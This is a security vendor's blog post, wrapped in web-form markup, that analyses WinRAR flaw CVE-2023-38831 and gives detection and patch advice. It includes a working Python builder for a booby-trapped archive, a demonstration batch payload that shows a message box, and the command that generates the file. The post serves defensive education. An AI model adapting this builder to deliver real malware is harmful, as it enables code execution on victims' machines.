<div class="hs_utm_content hs-utm_content hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_content-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_content"
for="utm_content-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_content</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_content" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_utm_campaign hs-utm_campaign hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_campaign-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_campaign"
for="utm_campaign-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_campaign</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_campaign" class="hs-input" type="hidden" value=""></div>
</div>
<div class="legal-consent-container">
<div class="hs-richtext">
<p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href="https://www.uptycs.com/privacy" target="_blank">Privacy Policy</a></u>.</p>
</div>
</div>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Request a Demo"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1713298179628","formDefinitionUpdatedAt":"1708973699207","lang":"en","legalConsentOptions":"{\"legitimateInterestSubscriptionTypes\":[3136631],\"communicationConsentCheckboxes\":[{\"communicationTypeId\":3136631,\"label\":\"I agree to receive other communications from Uptycs.\",\"required\":false}],\"legitimateInterestLegalBasis\":\"LEGITIMATE_INTEREST_PQL\",\"communicationConsentText\":\"Uptycs is committed to protecting and respecting your privacy, and we’ll only use your personal information to administer your account and to provide the products and services you requested from us. From time to time, we would like to contact you about our products and services, as well as other content that may be of interest to you. If you consent to us contacting you for this purpose, please tick below to say how you would like us to contact you:\",\"processingConsentType\":\"IMPLICIT\",\"processingConsentText\":\"In order to provide you the content requested, we need to store and process your personal data. If you consent to us storing your personal data for this purpose, please tick the checkbox below.\",\"processingConsentCheckboxLabel\":\"I agree to allow Uptycs to store and process my personal data.\",\"privacyPolicyText\":\"<p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href=\\\"https://www.uptycs.com/privacy\\\" target=\\\"_blank\\\">Privacy Policy</a></u>.</p>\",\"isLegitimateInterest\":true}","embedType":"REGULAR","clonedFromForm":"9f3fffac-7d79-4a57-ac39-94b68261d59a","notifyHubSpotOwner":"true","renderRawHtml":"true","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36","pageTitle":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","pageId":"133806526071","isHubSpotCmsGeneratedPage":true,"canonicalUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","contentType":"blog-post","hutk":"bebd24343e2ed718561e5a8f320fe293","__hsfp":726726051,"__hssc":"26386402.1.1713298181281","__hstc":"26386402.bebd24343e2ed718561e5a8f320fe293.1713298181281.1713298181281.1713298181281.1","formTarget":"#hs_form_target_form_134294284","formInstanceId":"4495","rawInlineMessage":"<div style=\"text-align: center;\">\n<div aria-setsize=\"-1\" id=\"1701201608.413599\" data-qa=\"virtual-list-item\" data-item-key=\"1701201608.413599\" tabindex=\"0\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div>\n<div>\n<div data-qa=\"message_content\" role=\"presentation\">\n<div>\n<div data-qa=\"message-text\">\n<div data-qa=\"block-kit-renderer\">\n<div>\n<div dir=\"auto\">\n<div style=\"font-size: 18px;\"><span style=\"color: #ffffff;\">Great! Well get back to you soon.</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div aria-setsize=\"-1\" id=\"1701201665.858649\" data-qa=\"virtual-list-item\" data-item-key=\"1701201665.858649\" tabindex=\"-1\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div data-stringify-ignore=\"true\" style=\"font-size: 18px;\" role=\"presentation\">&nbsp;</div>\n</div>\n</div>\n</div>\n</div>","hsFormKey":"5b517c9b8f80019bee1c3f2daa44d80e","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","dateFields":"became_an_mql_date","rumScriptExecuteTime":1339.6999969482422,"rumTotalRequestTime":1746.599998474121,"rumTotalRenderTime":1985.1999969482422,"rumServiceResponseTime":406.9000015258789,"rumFormRenderTime":238.5999984741211,"connectionType":"4g","firstContentfulPaint":0,"largestContentfulPaint":0,"locale":"en","timestamp":1713298181295,"originalEmbedContext":{"portalId":"2617658","formId":"464171ef-7766-4b86-9e48-f51bb13b325f","region":"na1","target":"#hs_form_target_form_134294284","isBuilder":false,"isTestPage":false,"isPreview":false,"formInstanceId":"4495","formsBaseUrl":"/_hcms/forms","css":"","inlineMessage":"<div style=\"text-align: center;\">\n<div aria-setsize=\"-1\" id=\"1701201608.413599\" data-qa=\"virtual-list-item\" data-item-key=\"1701201608.413599\" tabindex=\"0\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div>\n<div>\n<div data-qa=\"message_content\" role=\"presentation\">\n<div>\n<div data-qa=\"message-text\">\n<div data-qa=\"block-kit-renderer\">\n<div>\n<div dir=\"auto\">\n<div style=\"font-size: 18px;\"><span style=\"color: #ffffff;\">Great! Well get back to you soon.</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div aria-setsize=\"-1\" id=\"1701201665.858649\" data-qa=\"virtual-list-item\" data-item-key=\"1701201665.858649\" tabindex=\"-1\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div data-stringify-ignore=\"true\" style=\"font-size: 18px;\" role=\"presentation\">&nbsp;</div>\n</div>\n</div>\n</div>\n</div>","isMobileResponsive":true,"rawInlineMessage":"<div style=\"text-align: center;\">\n<div aria-setsize=\"-1\" id=\"1701201608.413599\" data-qa=\"virtual-list-item\" data-item-key=\"1701201608.413599\" tabindex=\"0\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div>\n<div>\n<div data-qa=\"message_content\" role=\"presentation\">\n<div>\n<div data-qa=\"message-text\">\n<div data-qa=\"block-kit-renderer\">\n<div>\n<div dir=\"auto\">\n<div style=\"font-size: 18px;\"><span style=\"color: #ffffff;\">Great! Well get back to you soon.</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div aria-setsize=\"-1\" id=\"1701201665.858649\" data-qa=\"virtual-list-item\" data-item-key=\"1701201665.858649\" tabindex=\"-1\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div data-stringify-ignore=\"true\" style=\"font-size: 18px;\" role=\"presentation\">&nbsp;</div>\n</div>\n</div>\n</div>\n</div>","hsFormKey":"5b517c9b8f80019bee1c3f2daa44d80e","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageId":"133806526071","contentType":"blog-post","formData":{"cssClass":"hs-form stacked hs-custom-form"},"isCMSModuleEmbed":true},"correlationId":"3b848806-0722-4949-a72e-4881906c88f1","renderedFieldsIds":["firstname","lastname","email","phone","company","how_did_you_hear_about_uptycs_","company_hq___state","jobtitle","numberofemployees","became_an_mql_date","honeypot_queue","ld_bookit_log_id","utm_source","utm_medium","utm_content","utm_campaign"],"captchaStatus":"NOT_APPLICABLE","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.5064","sourceName":"forms-embed","sourceVersion":"1.5064","sourceVersionMajor":"1","sourceVersionMinor":"5064","allPageIds":{"embedContextPageId":"133806526071","analyticsPageId":"133806526071","contentPageId":133806526071,"contentAnalyticsPageId":"133806526071"},"_debug_embedLogLines":[{"clientTimestamp":1713298179893,"level":"INFO","message":"Retrieved customer callbacks used on embed context: [\"getExtraMetaDataBeforeSubmit\"]"},{"clientTimestamp":1713298179894,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"WinRAR Vulnerability Exploitation: Decode & Bolster Protection\",\"pageUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\",\"pageId\":\"133806526071\",\"contentAnalyticsPageId\":\"133806526071\",\"contentPageId\":133806526071,\"isHubSpotCmsGeneratedPage\":true}"},{"clientTimestamp":1713298179897,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"DE\""},{"clientTimestamp":1713298181288,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"bebd24343e2ed718561e5a8f320fe293\",\"canonicalUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"contentType\":\"blog-post\",\"pageId\":\"133806526071\"}"}]}"><iframe
name="target_iframe_464171ef-7766-4b86-9e48-f51bb13b325f_4495" style="display: none;"></iframe>
</form>
Text Content
× This website stores cookies on your computer. These cookies are used to collect information about how you interact with our website and allow us to remember you. We use this information in order to improve and customize your browsing experience and for analytics and metrics about our visitors both on this website and other media. To find out more about the cookies we use, see our Privacy Policy If you decline, your information won’t be tracked when you visit this website. A single cookie will be used in your browser to remember your preference not to be tracked. Accept Decline * Why Uptycs? * Products Show submenu for Products HYBRID CLOUD SECURITY PLATFORM * CNAPP Overview * Workload Protection (CWPP) * Container and K8s Security (KSPM) * Posture Management (CSPM) * Entitlement Management (CIEM) * Threat Detection and Response (CDR) ENDPOINT SECURITY * XDR Overview * Workspace and Workload Security * IBM Power, Linux on Z, LinuxONE, and AIX * Uptycs XDR vs. The Old Way * Solutions Show submenu for Solutions BY USE CASE * Compliance * Vulnerability Management * Detection and Response * Threat Hunting * Forensic Investigation * Managed Services (MDR) BY ENVIRONMENT * AWS * Azure * Google Cloud * IBM * Partners * Resources Show submenu for Resources RESOURCES * Resource Center * Customer Stories * Blog * Events and Webinars * Reviews COMMUNITY * osquery Community * osquery: what is it * Cybersecurity Standup FEATURED KuppingerCole positions Uptycs a CSPM Technology Leader * Company Show submenu for Company * Overview * Press and News * Contact Us * Support * Training * Careers * Security Practices * Why Uptycs? * Products Show submenu for Products HYBRID CLOUD SECURITY PLATFORM * CNAPP Overview * Workload Protection (CWPP) * Container and K8s Security (KSPM) * Posture Management (CSPM) * Entitlement Management (CIEM) * Threat Detection and Response (CDR) ENDPOINT SECURITY * XDR Overview * Workspace and Workload Security * IBM Power, Linux on Z, LinuxONE, and AIX * Uptycs XDR vs. The Old Way * Solutions Show submenu for Solutions BY USE CASE * Compliance * Vulnerability Management * Detection and Response * Threat Hunting * Forensic Investigation * Managed Services (MDR) BY ENVIRONMENT * AWS * Azure * Google Cloud * IBM * Partners * Resources Show submenu for Resources RESOURCES * Resource Center * Customer Stories * Blog * Events and Webinars * Reviews COMMUNITY * osquery Community * osquery: what is it * Cybersecurity Standup FEATURED KuppingerCole positions Uptycs a CSPM Technology Leader * Company Show submenu for Company * Overview * Press and News * Contact Us * Support * Training * Careers * Security Practices Request a demo INSIDE THE WINRAR VULNERABILITY: DECODING & BOLSTERING PROTECTION Tags: Threats UPTYCS THREAT RESEARCH September 08, 2023 Share: * * * * Authors: Siddartha Malladi and Arpit Kataria It’s been two weeks since researchers uncovered a high severity security flaw in the WinRAR utility that cyber adversaries are using to exploit the trusted ZIP archive format for malicious code execution. With active exploits currently underway, organizations are urged to update their software. The sheer ubiquity of WinRAR in corporate settings makes this vulnerability an urgent concern. What sets this issue apart is its deceptive simplicity: an attacker can mask malicious scripts within a ZIP file, misleading both users and rudimentary security controls. Initial reports indicate that this technique has been weaponized against specialized online communities like those focused on cryptocurrency and stock trading. Our deep-dive analysis offers not only a comprehensive understanding of the vulnerability but also practical steps for detection and mitigation. This is more than just another vulnerability explainer; consider it a comprehensive guide for cybersecurity professionals who need to understand the 'how' and 'why' behind CVE-2023-38831. Armed with this knowledge, you'll be better prepared to thwart attackers aiming to exploit this vulnerability in your organization. UNDERSTANDING THE WINRAR VULNERABILITY The recently unveiled WinRAR vulnerability, tracked as CVE-2023-38831, poses a unique challenge for cybersecurity professionals. This flaw disrupts WinRAR's handling of file extensions, opening doors for unauthorized code execution. What makes it particularly insidious is its ability to hide malicious executables within seemingly benign files, such as .PDFs or .JPGs, in an archive. Recent evidence indicates that threat actors are capitalizing on this vulnerability to target cryptocurrency and stock trading communities, deploying malicious payloads like DarkMe, GuLoader, and Remcos RAT. These exploits have been on the rise from April to August 2023, magnifying the urgency for effective mitigation strategies among security teams. CVE-2023-38831: TECHNICAL INSIGHTS Cybercriminals are exploiting a security loophole in WinRAR that enables file extension spoofing. This deceptive technique enables them to embed malicious code in an archive disguised as a benign ".jpg", ".txt", or other commonly recognized file types. They package both benign and malicious files within a single ZIP archive. When victims open this malicious package, they see what seems like an image file and a folder with the same name as the image. Figure1 – Exploitation flow of CVE-2023-38831 Figure 2 – Malicious RAR file This RAR contains image.jpg file and image.jpg folder. The image.jpg file is a decoy file and the image.jpg folder acts as script carrier. The folder houses a script set to execute upon the opening of the decoy file. Figure 3 – Victim opening image.jpg file In this demonstration, clicking on the image.jpg file opens not only a decoy image but also executes a script. This script triggers a dialog box that displays the message "Exploited CVE-2023-38831". Note that this is merely a demonstration. In a real-world scenario, a threat actor could design the script to display an image while clandestinely running a script to download malware in the background. EXPLOITATION MECHANICS Now let’s dive into the details of how the exploitation works * Within the ZIP archive, a file with the name “image.jpg” exists; however, a trailing space is intentionally added, making it “image.jpg ”. * Inside the ZIP archive, there's a folder "image.jpg " that has a file inside. This file contains malicious code, such as a script designed to download malware. This file has the same name as the tricky file above, but with extra stuff at the end, like "image.jpg .cmd ". Importantly, the trailing space is intentionally included as part of the filename. * When an application like WinRAR processes the ZIP archive, it encounters the deceptive “image.jpg “ file and fails to properly handle the trailing space, leading to the vulnerability. * Due to this improper handling, WinRAR executes unintended actions. It follows the instructions in the tricky file ("image.jpg .cmd ") without realizing it's bad. These instructions make the computer run a program that it shouldn't. Note: The exploit is only triggered if the victim both opens the RAR archive and accesses the image file specifically within WinRAR. Once the victim clicks on the image.jpg file, WinRAR triggers the following command: cmd.exe /c C:\Users\<user>\AppData\Local\Temp\Rar$DIa6116.27667\image.jpg .cmd. Figure 4 – Inside image.jpg folder To execute the previously outlined attack vector, we can utilize the following Python exploit script coupled with a batch payload script. Exploit Script: import shutil import os import sys from os.path import join def generate_exploit(folder_name, decoy_filename, payload_filename, output_filename): decoy_ext = os.path.splitext(decoy_filename)[1].encode("utf-8") if os.path.exists(folder_name): shutil.rmtree(folder_name) os.mkdir(folder_name) sub_dir = join(folder_name, decoy_filename + "1") if not os.path.exists(sub_dir): os.mkdir(sub_dir) shutil.copyfile(join(payload_filename), join(sub_dir, decoy_filename+"1.cmd")) shutil.copyfile(join(decoy_filename), join(folder_name, decoy_filename+"2")) shutil.make_archive(folder_name, 'zip', folder_name) with open(folder_name + ".zip", "rb") as f: content = f.read() content = content.replace(decoy_ext + b"1", decoy_ext + b" ") content = content.replace(decoy_ext + b"2", decoy_ext + b" ") os.remove(folder_name + ".zip") with open(output_filename, "wb") as f: f.write(content) print("Exploit generated successfully:", output_filename) def main(): if len(sys.argv) < 4: print("""Usage: python .\exploit.py <decoy_filename> <payload_filename> <output_filename>""") else: if len(sys.argv) != 4: print("Invalid number of parameters.") else: folder_name = "Malicious_file" decoy_filename = os.path.basename(sys.argv[1]) payload_filename = os.path.basename(sys.argv[2]) output_filename = os.path.basename(sys.argv[3]) generate_exploit(folder_name, decoy_filename, payload_filename, output_filename) if __name__ == "__main__": main() Payload script: echo x=msgbox(" Exploited the CVE-2023-38831 " ,0, "WinRAR") >> msgbox.vbs & start msgbox.vbs & image.jpg Save the Python script as exploit.py and batch file as payload.bat. Additionally, place an image file renamed to image.jpg in the same folder. Now run the following command in order to generate a malicious RAR file: python .\exploit.py image.jpg payload.bat poc.rar The Python script employs several tactics. Firstly, it creates a directory named "Malicious_file," into which it places a duplicate of the image file, now renamed to "image.jpg1". It also generates a sub-directory, "image.jpg2" which houses a hidden payload named "image.jpg .cmd." The script then compresses these contents into a ZIP archive. In the final step, it subtly modifies the file names by replacing numerical suffixes with trailing spaces, exploiting the vulnerability. DETECTION THROUGH UPTYCS XDR Should your system have a vulnerable version of WinRAR, Uptycs XDR offers robust vulnerability scanning features for timely detection. Uptycs XDR stores vulnerability scan results in a dedicated table, accessible via SQL queries, as shown below: select cve_list, package_name, package_version, cvss_score, os from vulnerabilities where cve_list = 'CVE-2023-38831' Figure 5 – Detection of CVE-2023-38831 using vulnerability scan To remediate this issue, RARlab has issued WinRAR version 6.23; all preceding versions remain vulnerable. Figure 6 – Detection of exploitation of the vulnerability CONCLUSION In summary, the CVE-2023-38831 vulnerability in WinRAR underscores the increasingly sophisticated tactics employed by cybercriminals. By exploiting file extension spoofing, they are able to embed malicious code within seemingly benign files. This serves as a cautionary tale for security teams, particularly those protecting environments where sensitive financial transactions occur, such as trading platforms. As threat actors evolve their techniques, it becomes increasingly imperative for cybersecurity professionals to maintain up-to-date software, implement robust security measures, and foster a culture of cybersecurity awareness within their organizations. RECOMMENDED CONTENT MASTERING CLOUD SECURITY: THE SERIES Read More MASTERING KUBERNETES SECURITY: THE SERIES Read More THE CISO PLAYBOOK: SECURITY, COMPLIANCE & EFFICIENCY Read More SIGN UP FOR A DEMO SIGN UP HERE: First name* Last name* Work Email* Phone number Company name* My security priority is: How did you hear about us? Company HQ - State Job title Employees Became an MQL date What color is the sky? LD BookIt Log ID utm_source utm_medium utm_content utm_campaign You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our Privacy Policy. STAY IN THE LOOP Get regular updates on all things Uptycs— from product updates to expert articles and much more Work Email* What color is the sky? PRODUCTS CLOUD SECURITY * Overview * Workload Protection (CWPP) * Container and K8s Security (KSPM) * Posture Management (CSPM) * Entitlement Management (CIEM) * Threat Detection and Response (CDR) ENDPOINT SECURITY * Overview * Workspace and Workload Security * IBM Power, Linux on Z, LinuxONE, and AIX * Uptycs XDR vs. The Old Way SOLUTIONS BY USE CASE * Compliance * Asset Management * Vulnerability Management * Detection and Response * Threat Hunting * Forensic Investigation * Managed Services (MDR) BY PLATFORM * AWS * Azure * Google Cloud * IBM RESOURCES RESOURCE CENTER * Resource Center * Customer Stories * Blog COMMUNITY * Events * osquery Community * osquery: what is it * Cybersecurity Standup COMPANY * Overview * Partners * Press and News * Contact Us * Support * Training * Careers * Security Practices * Terms of Service WHY UPTYCS? FOLLOW US * * * * © 2024 Uptycs. All rights reserved. * Privacy Policy * Security Practices * Contact Us × CONNECT WITH A SECURITY EXPERT First name* Last name* Work Email* Phone number Company name* How did you hear about Uptycs? Company HQ - State Job title Employees Became an MQL date What color is the sky? LD BookIt Log ID utm_source utm_medium utm_content utm_campaign You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our Privacy Policy. Also of Interest * Protect Your Cloud: Get Inside the Mind of a... * Uptycs Quarterly Threat Bulletin Details... * WinRAR CVE-2023-38831 Vulnerability Draws...